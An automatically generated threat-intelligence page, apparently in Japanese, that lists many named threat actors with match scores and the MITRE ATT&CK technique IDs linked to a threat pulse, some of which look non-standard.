  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1488 - Disk Content Wipe
  • T1592.003 - Firmware
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Tonto Team

Score: 11.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1547.011 - Plist Modification
  • T1059.001 - PowerShell
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Andariel

Score: 6.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

BRONZE BUTLER

Score: 17.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
MITREへのリンク →

APT38

Score: 31.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1027 - Obfuscated Files or Information
  • T1174 - Password Filter DLL
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
  • T1216 - System Script Proxy Execution
MITREへのリンク →

MuddyWater

Score: 40.80
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1518.002 - Backup Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1159 - Launch Agent
MITREへのリンク →

Naikon

Score: 7.99
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1506 - Web Session Cookie
MITREへのリンク →

Molerats

Score: 6.13
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1562.012 - Disable or Modify Linux Audit System
MITREへのリンク →

admin@338

Score: 6.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1218.010 - Regsvr32
MITREへのリンク →

Gamaredon Group

Score: 34.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1045 - Software Packing
  • T1218.012 - Verclsid
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1059.013 - Container CLI/API
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Darkhotel

Score: 14.99
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1590.006 - Network Security Appliances
  • T1564.002 - Hidden Users
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

APT32

Score: 34.47
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1218.010 - Regsvr32
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

The White Company

Score: 7.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

IndigoZebra

Score: 3.65
Matched TTPs:
  • T1087.002 - Domain Account
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
MITREへのリンク →

APT33

Score: 7.71
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
MITREへのリンク →

Silence

Score: 13.53
Matched TTPs:
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1547.011 - Plist Modification
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Sidewinder

Score: 20.42
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1159 - Launch Agent
MITREへのリンク →

Confucius

Score: 8.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
MITREへのリンク →

BlackTech

Score: 6.34
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
MITREへのリンク →

Windshift

Score: 9.39
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1506 - Web Session Cookie
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
MITREへのリンク →

Scattered Spider

Score: 41.04
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1566.002 - Spearphishing Link
  • T1019 - System Firmware
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1051 - Shared Webroot
  • T1218.005 - Mshta
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1090.004 - Domain Fronting
  • T1564.003 - Hidden Window
  • T1027.002 - Software Packing
MITREへのリンク →

Storm-0501

Score: 21.97
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1140 - Deobfuscate/Decode Files or Information
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1090.004 - Domain Fronting
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Evilnum

Score: 6.55
Matched TTPs:
  • T1562.009 - Safe Mode Boot
  • T1089 - Disabling Security Tools
  • T1070.009 - Clear Persistence
MITREへのリンク →

Volt Typhoon

Score: 53.31
Matched TTPs:
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1556.002 - Password Filter DLL
  • T1140 - Deobfuscate/Decode Files or Information
  • T1070.008 - Clear Mailbox Data
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1049 - System Network Connections Discovery
  • T1057 - Process Discovery
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1488 - Disk Content Wipe
  • T1065 - Uncommonly Used Port
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1159 - Launch Agent
  • T1574.002 - DLL Side-Loading
  • T1569.002 - Service Execution
MITREへのリンク →

Silent Librarian

Score: 7.15
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1584.005 - Botnet
  • T1199 - Trusted Relationship
MITREへのリンク →

ZIRCONIUM

Score: 21.93
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1685.002 - Disable or Modify Cloud Log
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Cinnamon Tempest

Score: 8.74
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1199 - Trusted Relationship
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Velvet Ant

Score: 17.03
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1036.009 - Break Process Trees
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1569.002 - Service Execution
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Aquatic Panda

Score: 21.24
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1562.004 - Disable or Modify System Firewall
  • T1552.004 - Private Keys
  • T1136.002 - Domain Account
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

APT3

Score: 20.71
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1562.012 - Disable or Modify Linux Audit System
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

BackdoorDiplomacy

Score: 8.61
Matched TTPs:
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1136.002 - Domain Account
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
MITREへのリンク →

HAFNIUM

Score: 12.42
Matched TTPs:
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target
MITREへのリンク →

INC Ransom

Score: 9.48
Matched TTPs:
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1070.009 - Clear Persistence
MITREへのリンク →

BlackByte

Score: 21.44
Matched TTPs:
  • T1070.003 - Clear Command History
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
MITREへのリンク →

Mustard Tempest

Score: 3.74
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

APT42

Score: 8.24
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
MITREへのリンク →

GOLD SOUTHFIELD

Score: 6.26
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1573 - Encrypted Channel
  • T1601.001 - Patch System Image
MITREへのリンク →

Fox Kitten

Score: 18.67
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1051 - Shared Webroot
  • T1059.001 - PowerShell
  • T1601.001 - Patch System Image
MITREへのリンク →

ToddyCat

Score: 5.71
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1506 - Web Session Cookie
MITREへのリンク →

Blue Mockingbird

Score: 4.66
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1045 - Software Packing
  • T1199 - Trusted Relationship
MITREへのリンク →

Volatile Cedar

Score: 8.19
Matched TTPs:
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1002 - Data Compressed
MITREへのリンク →

Akira

Score: 6.88
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Carbanak

Score: 5.29
Matched TTPs:
  • T1009 - Binary Padding
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
MITREへのリンク →

Stealth Falcon

Score: 7.84
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
MITREへのリンク →

Leafminer

Score: 9.05
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1601.001 - Patch System Image
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

LAPSUS$

Score: 22.74
Matched TTPs:
  • T1562.012 - Disable or Modify Linux Audit System
  • T1019 - System Firmware
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1592.003 - Firmware
  • T1065 - Uncommonly Used Port
  • T1564.003 - Hidden Window
MITREへのリンク →

FIN5

Score: 7.32
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1199 - Trusted Relationship
  • T1070.009 - Clear Persistence
MITREへのリンク →

Lotus Blossom

Score: 5.25
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1569.002 - Service Execution
MITREへのリンク →

Deep Panda

Score: 3.29
Matched TTPs:
  • T1177 - LSASS Driver
MITREへのリンク →

CopyKittens

Score: 3.19
Matched TTPs:
  • T1045 - Software Packing
  • T1199 - Trusted Relationship
MITREへのリンク →

MoustachedBouncer

Score: 4.39
Matched TTPs:
  • T1045 - Software Packing
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Windigo

Score: 9.19
Matched TTPs:
  • T1045 - Software Packing
  • T1055.013 - Process Doppelgänging
  • T1059.012 - Hypervisor CLI
  • T1159 - Launch Agent
MITREへのリンク →

POLONIUM

Score: 5.20
Matched TTPs:
  • T1045 - Software Packing
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
MITREへのリンク →

Metador

Score: 4.69
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1070.009 - Clear Persistence
MITREへのリンク →

Equation

Score: 8.26
Matched TTPs:
  • T1130 - Install Root Certificate
  • T1037.001 - Logon Script (Windows)
MITREへのリンク →

Strider

Score: 7.06
Matched TTPs:
  • T1130 - Install Root Certificate
  • T1569.002 - Service Execution
MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

APT41

Score: 0.70
Matched TTPs:
  • T1684 - Social Engineering
  • T1584.008 - Network Devices
  • T1552.004 - Private Keys
  • T1027 - Obfuscated Files or Information
  • T1574.002 - DLL Side-Loading
  • T1002 - Data Compressed
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.010 - Regsvr32
  • T1588.001 - Malware
  • T1048 - Exfiltration Over Alternative Protocol
  • T1089 - Disabling Security Tools
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1177 - LSASS Driver
  • T1037.001 - Logon Script (Windows)
  • T1564.003 - Hidden Window
  • T1562.004 - Disable or Modify System Firewall
  • T1045 - Software Packing
  • T1573 - Encrypted Channel
  • T1537 - Transfer Data to Cloud Account
  • T1070.009 - Clear Persistence
  • T1499.001 - OS Exhaustion Flood
  • T1590.006 - Network Security Appliances
MITREへのリンク →

Mustang Panda

Score: 0.70
Matched TTPs:
  • T1218.012 - Verclsid
  • T1566.002 - Spearphishing Link
  • T1055.013 - Process Doppelgänging
  • T1102.003 - One-Way Communication
  • T1091 - Replication Through Removable Media
  • T1087.002 - Domain Account
  • T1055.005 - Thread Local Storage
  • T1218.010 - Regsvr32
  • T1608.005 - Link Target
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1199 - Trusted Relationship
  • T1593.002 - Search Engines
  • T1087.004 - Cloud Account
  • T1608 - Stage Capabilities
  • T1169 - Sudo
  • T1569.001 - Launchctl
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1003 - OS Credential Dumping
MITREへのリンク →

Kimsuky

Score: 0.69
Matched TTPs:
  • T1684 - Social Engineering
  • T1055.014 - VDSO Hijacking
  • T1218.012 - Verclsid
  • T1566.002 - Spearphishing Link
  • T1102.003 - One-Way Communication
  • T1009 - Binary Padding
  • T1091 - Replication Through Removable Media
  • T1506 - Web Session Cookie
  • T1003.003 - NTDS
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1003.007 - Proc Filesystem
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1606.002 - SAML Tokens
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1057 - Process Discovery
  • T1087.004 - Cloud Account
  • T1608 - Stage Capabilities
  • T1051 - Shared Webroot
  • T1537 - Transfer Data to Cloud Account
  • T1070.009 - Clear Persistence
  • T1590.006 - Network Security Appliances
MITREへのリンク →

UNC3886

Score: 0.62
Matched TTPs:
  • T1588.001 - Malware
  • T1546.003 - Windows Management Instrumentation Event Subscription
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1003.006 - DCSync
  • T1606.002 - SAML Tokens
  • T1546.002 - Screensaver
  • T1070.009 - Clear Persistence
  • T1499.001 - OS Exhaustion Flood
  • T1136.002 - Domain Account
  • T1488 - Disk Content Wipe
  • T1021.006 - Windows Remote Management
  • T1009 - Binary Padding
  • T1140 - Deobfuscate/Decode Files or Information
  • T1556.002 - Password Filter DLL
  • T1689 - Downgrade Attack
  • T1090.002 - External Proxy
MITREへのリンク →

Volt Typhoon

Score: 0.62
Matched TTPs:
  • T1488 - Disk Content Wipe
  • T1102.003 - One-Way Communication
  • T1574.002 - DLL Side-Loading
  • T1140 - Deobfuscate/Decode Files or Information
  • T1049 - System Network Connections Discovery
  • T1003.007 - Proc Filesystem
  • T1065 - Uncommonly Used Port
  • T1070.008 - Clear Mailbox Data
  • T1569.002 - Service Execution
  • T1562.009 - Safe Mode Boot
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1057 - Process Discovery
  • T1045 - Software Packing
  • T1537 - Transfer Data to Cloud Account
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
  • T1590.006 - Network Security Appliances
  • T1556.002 - Password Filter DLL
MITREへのリンク →

Sandworm Team

Score: 0.58
Matched TTPs:
  • T1566.002 - Spearphishing Link
  • T1102.003 - One-Way Communication
  • T1091 - Replication Through Removable Media
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1049 - System Network Connections Discovery
  • T1218.010 - Regsvr32
  • T1558 - Steal or Forge Kerberos Tickets
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1199 - Trusted Relationship
  • T1562.012 - Disable or Modify Linux Audit System
  • T1087.004 - Cloud Account
  • T1562.004 - Disable or Modify System Firewall
  • T1045 - Software Packing
  • T1573 - Encrypted Channel
  • T1075 - Pass the Hash
  • T1005 - Data from Local System
  • T1070.009 - Clear Persistence
MITREへのリンク →

Magic Hound

Score: 0.56
Matched TTPs:
  • T1592.003 - Firmware
  • T1566.002 - Spearphishing Link
  • T1009 - Binary Padding
  • T1587.003 - Digital Certificates
  • T1027 - Obfuscated Files or Information
  • T1098.002 - Additional Email Delegate Permissions
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1683 - Generate Content
  • T1070.003 - Clear Command History
  • T1199 - Trusted Relationship
  • T1036.009 - Break Process Trees
  • T1562.004 - Disable or Modify System Firewall
  • T1045 - Software Packing
  • T1070.009 - Clear Persistence
  • T1590.006 - Network Security Appliances
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

FIN7

Score: 0.56
Matched TTPs:
  • T1218.012 - Verclsid
  • T1055.013 - Process Doppelgänging
  • T1009 - Binary Padding
  • T1091 - Replication Through Removable Media
  • T1027 - Obfuscated Files or Information
  • T1059.001 - PowerShell
  • T1601.001 - Patch System Image
  • T1087.002 - Domain Account
  • T1564.002 - Hidden Users
  • T1011.001 - Exfiltration Over Bluetooth
  • T1140 - Deobfuscate/Decode Files or Information
  • T1584.005 - Botnet
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1065 - Uncommonly Used Port
  • T1606.002 - SAML Tokens
  • T1199 - Trusted Relationship
  • T1057 - Process Discovery
  • T1573 - Encrypted Channel
MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

← Pulse一覧に戻る